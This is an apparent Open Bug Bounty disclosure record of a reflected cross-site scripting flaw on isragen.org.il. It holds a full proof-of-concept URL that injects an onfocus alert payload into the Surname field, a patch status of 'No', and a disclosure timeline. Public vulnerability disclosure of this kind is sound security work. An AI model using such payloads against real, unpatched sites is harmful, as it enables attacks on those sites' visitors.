isragen.org.il XSS vulnerability

2017-05-20T15:38:00
ID OBB:239351
Type openbugbounty
Reporter Omegaton
Modified 2017-05-27T16:15:00

Description

Vulnerable URL:
http://www.isragen.org.il/siteFiles/1/153/7898.asp?action=go&search;=sample&First;_Name='">&First;_Name_H=&First;_Name_mode=0&First;_Name_H_mode=0&Surname;=" autofocus onfocus='alert(/OPENBUGBOUNTY/)' a="&Surname;_H=&Surname;_mode=0&Surname;_H_mode=0&Birth;_Year=&Birth;_Year_H=&Death;_Year=&Death;_Year_H=
Details:

Description| Value
---|---
Patched:| No
Latest check for patch:| 28.07.2017
Vulnerability type:| XSS
Vulnerability status:| Publicly disclosed
Alexa Rank| 3163653
VIP website status:| No
Check isragen.org.il SSL connection:| (Grade: F)

Coordinated Disclosure Timeline:

Description| Value
---|---
Vulnerability submitted via Open Bug Bounty| 20 May, 2017 15:38 GMT
Generic security notifications sent to website owner| 27 May, 2017 04:00 GMT
Vulnerability details disclosed by researcher| 27 May, 2017 16:15 GMT